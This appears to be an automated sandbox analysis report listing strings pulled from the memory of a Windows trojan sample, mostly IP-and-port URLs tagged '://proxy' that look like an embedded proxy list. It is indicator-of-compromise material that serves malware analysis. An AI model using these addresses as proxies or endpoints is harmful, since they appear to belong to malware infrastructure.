                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.45.192:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:50837
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:50837://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:51187
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:51187://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:51213
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:51213://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC173000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:51935
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:51935://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:53741
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:53741://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:56581
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:56581://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:58684
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:58684://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:59159
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:59159://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:59243
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:59243://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FA0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:60377
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:60377://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:60512
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:60512://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:62572
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:62572://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9581000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C93C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:64151
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C93C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:64151://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:64193
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:64193://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.224.187.170:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.224.187.170:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.224.243.185:37793
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.224.243.185:37793://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.184.81
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.184.81://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.184.81:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.217.192:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.217.192:8000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.217.197:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.217.197:8000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.245.255
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.245.255://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.245.255:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.77.168:8585
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.77.168:8585://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.69.214.139:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.69.214.139:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.8.114.37
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.8.114.37://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.8.114.37:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.8.114.37:8123
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.8.114.37:81230k&
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.8.114.37:8123://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.89.113.155:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.89.113.155:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.89.173.98:14061
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.89.173.98:14061://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.89.173.98:14061x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://16.163.88.228
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://16.163.88.228://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://16.163.88.228:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://16.170.1.8
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://16.170.1.8://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://16.170.1.8:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:5436
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:5436://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:5784
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:5784://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C668F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.16.105.145:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C668F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.16.105.145:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.16.105.145:8080p
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.19.169.208:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.19.169.208:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C91FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.226.203.247:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C94FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.226.203.247:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.226.203.247:1080x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.184.201:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.184.201:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:587
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:587://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.251.141.208:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.251.141.208:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C815E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.251.19.23:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.251.19.23:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.3.168.70:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.3.168.70:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.10.245.210:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.10.245.210:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.132.48.32:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.132.48.32:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8267000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.202.226.194:8123
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.202.226.194:8123://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.35.88.21:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.35.88.21:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.35.91.95
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.35.91.95://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.35.91.95:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.104.117:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.104.117:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:15371
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:15371://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C75B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:19655
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:19655://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:2838
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:2838://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:37257
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:37257://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:43131
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:43131://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.160.
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA51A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA51E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.160.158:11018
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA51A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.160.158:11018://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.160.158:13994
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.160.158:13994://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.160.158:42543
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.160.158:42543://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.160.158:5814
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.160.158:5814://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.160.158:58943
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.160.158:58943://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.160.158:59778
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.160.158:59778://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:13106
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:13106://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:29631
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:29631://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:29631xD
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C915F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9164000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:31125
